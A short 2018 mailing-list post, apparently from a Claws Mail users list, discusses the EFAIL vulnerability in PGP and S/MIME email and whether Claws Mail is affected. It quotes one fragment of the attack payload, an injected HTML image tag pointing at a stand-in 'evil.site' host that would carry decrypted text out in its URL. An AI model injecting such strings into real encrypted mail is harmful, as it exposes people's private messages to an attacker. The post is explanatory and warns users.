[Users] FYI: PGP-encrypted email Warning
Steffen Klemer
moh at gmx.org
Mon May 14 14:25:36 CEST 2018
Am Mo, 14.05.2018 um 02:34 schrieb Charles A Edwards <cae at eslrahc.com>:
> https://www.eff.org/deeplinks/2018/05/attention-pgp-users-new-vulnerabilities-require-you-take-action-now
The corresponding paper got out:
https://efail.de/
It's mostly about the possibility to change clear text of PGP and S/MIME
mails. The way the scientists use this is by injecting a string like
<img src="http://evil.site/what-follows-is-secret/
Claws doesn't usually load images from html mails -- especially not
without an html plugin. But nevertheless it should be affected by the
underlying problem itself.
Steffen
--
() ascii ribbon campaign - against html e-mail
/\ - against proprietary attachments
More information about the Users
mailing list